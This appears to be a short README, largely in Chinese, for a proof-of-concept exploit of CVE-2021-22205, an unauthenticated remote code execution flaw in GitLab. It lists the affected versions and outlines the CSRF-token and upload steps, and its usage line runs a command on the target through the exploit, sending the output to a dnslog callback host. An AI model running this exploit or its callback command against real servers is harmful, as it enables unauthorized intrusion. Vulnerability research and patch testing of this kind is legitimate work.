CVE-2021-22205
影响版本:
- Gitlab CE/EE < 13.10.3
- Gitlab CE/EE < 13.9.6
- Gitlab CE/EE < 13.8.8
Usage
python3 CVE-2021-22205.py target "curl \`whoami\`.dnslog"
获取csrf-token:
通过 /users/sign_in 获取csrf-token 然后使用前面的 CVE-2021-22205 poc 进行构造上传包进行执行未经身份验证的上传请求,最终rce
ref:
- https://hackerone.com/reports/1154542
- https://security.humanativaspa.it/gitlab-ce-cve-2021-22205-in-the-wild/
- https://forum.ywhack.com/viewthread.php?tid=115611
- https://forum.ywhack.com/viewthread.php?tid=116706
- https://github.com/RedTeamWing/CVE-2021-22205